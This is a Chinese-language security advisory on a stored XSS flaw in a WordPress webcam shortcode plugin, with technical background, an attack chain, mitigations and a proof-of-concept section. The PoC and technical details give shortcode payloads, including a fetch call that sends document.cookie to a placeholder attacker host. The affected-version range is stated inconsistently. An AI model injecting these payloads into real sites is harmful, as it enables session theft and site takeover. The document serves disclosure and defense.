CVE-2025-10129 WordPress Live Webcam Widget插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-10129

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Live Webcam Widget & Shortcode 插件

漏洞概述

CVE-2025-10129是WordPress Live Webcam Widget & Shortcode插件中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞由Wordfence安全团队的安全研究员发现，并于2025年10月11日公开披露。该插件允许用户在WordPress网站中嵌入实时网络摄像头视频流，CVSS评分为6.4分，属于中危级别。

该漏洞存在于插件的'webcam'短代码（shortcode）功能中。由于插件在处理用户提供的短代码属性时，未能进行充分的输入清理（input sanitization）和输出转义（output escaping），导致经过身份验证的攻击者可以在页面中注入任意恶意的JavaScript脚本代码。这些恶意脚本将被持久化存储在网站数据库中，每当有合法用户访问包含恶意短代码的页面时，注入的脚本就会自动执行。

该漏洞影响该插件的所有版本，最高至1.2版本。由于利用该漏洞需要贡献者级别（contributor-level）及以上的权限，因此普通访客无法直接利用此漏洞。但一旦恶意脚本被执行，攻击者可以窃取用户的会话cookie、进行权限提升、植入后门、重定向用户到恶意网站，甚至完全控制受影响的WordPress网站。该漏洞的危害范围可能波及网站的所有访问者和管理员。

技术细节

该漏洞的核心问题在于WordPress Live Webcam Widget & Shortcode插件在处理'webcam'短代码属性时缺乏必要的安全防护措施。具体技术原理如下：

1. **短代码机制**：WordPress短代码（Shortcode）是WordPress提供的一种内容嵌入机制，允许通过[shortcode attr1="value1" attr2="value2"]的形式在文章或页面中嵌入特定功能。插件通过注册'webcam'短代码来处理用户输入的属性。

2. **输入清理缺失**：当贡献者或更高权限的用户在文章/页面编辑器中插入带有恶意属性的webcam短代码时，插件未对属性值进行适当的输入清理。WordPress提供的sanitize_text_field()、wp_kses()、esc_attr()等函数可以有效过滤恶意HTML和JavaScript代码，但该插件未使用这些安全函数。

3. **输出转义缺失**：即使输入被存储到数据库中，如果插件在渲染页面时使用esc_html()、esc_attr()等函数对输出进行转义，也能防止XSS攻击。然而，该插件在输出短代码内容时直接输出了原始的用户输入，未进行任何转义处理。

4. **利用方式**：攻击者通过在短代码属性中注入类似"onmouseover='alert(document.cookie)'"或""><script>fetch('https://attacker.com/?c='+document.cookie)</script>"这样的恶意代码，当其他用户访问包含该短代码的页面时，恶意脚本将在受害者的浏览器上下文中执行。

5. **权限要求**：该漏洞需要贡献者级别及以上权限（PR:L），这意味着攻击者需要先获取一个有效的低权限账户，但一旦获取，攻击门槛非常低。

攻击链分析

STEP 1

步骤1：获取低权限账户

攻击者通过社会工程学、注册开放注册或购买凭证等方式获取目标WordPress网站的贡献者（contributor）级别或以上权限的账户。

STEP 2

步骤2：构造恶意短代码

攻击者创建一个新的文章或页面，在内容中插入带有恶意JavaScript代码的webcam短代码，利用未过滤的属性注入XSS payload。

STEP 3

步骤3：发布恶意内容

攻击者将包含恶意短代码的内容发布或提交审核。由于短代码内容被存储到数据库中，恶意脚本实现持久化存储。

STEP 4

步骤4：等待受害者访问

合法用户（包括管理员）访问包含恶意短代码的页面时，浏览器解析并执行注入的JavaScript代码。

STEP 5

步骤5：执行恶意操作

恶意脚本在受害者浏览器上下文中执行，可窃取会话cookie、进行权限提升、植入Web Shell、重定向到钓鱼页面或执行其他恶意操作。

STEP 6

步骤6：权限提升与持久化

如果管理员执行了恶意脚本，攻击者可获取管理员权限，创建新的管理员账户或安装后门插件，实现对网站的完全控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Stored XSS PoC for CVE-2025-10129 -->
<!-- Exploit via webcam shortcode attribute injection -->
<!-- Requires contributor-level or higher access -->

[webcam url="javascript:alert('XSS')" width="" onmouseover="alert(document.cookie)"]

<!-- Alternative payload using script injection in attribute -->
[webcam url='" onerror="alert(document.domain)" x="' width="640"]

<!-- Payload for cookie stealing -->
[webcam url='" onerror="fetch('https://attacker.com/steal?c='+document.cookie)" x="' width="640"]

<!-- Steps to exploit:
1. Login as contributor or higher role user
2. Create a new post or page
3. Add the malicious webcam shortcode with XSS payload in attributes
4. Publish/save the post
5. When any user (including admin) views the post, the script executes
-->

影响范围

WordPress Live Webcam Widget & Shortcode < 1.2

WordPress Live Webcam Widget & Shortcode 1.2及以下所有版本

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1）立即停用WordPress Live Webcam Widget & Shortcode插件；2）如果必须使用该插件，临时将所有贡献者级别及以上用户的权限降级为订阅者（subscriber），阻止其创建新内容；3）审查并清理已发布内容中所有包含webcam短代码的文章和页面，移除可疑属性；4）在WordPress配置中通过functions.php添加代码禁用webcam短代码注册（remove_shortcode('webcam')）；5）部署Web应用防火墙规则，阻止包含可疑JavaScript代码的短代码属性；6）启用内容安全策略（CSP）头，限制页面中内联脚本的执行；7）密切监控网站日志，检测异常的JavaScript执行和未授权的访问行为。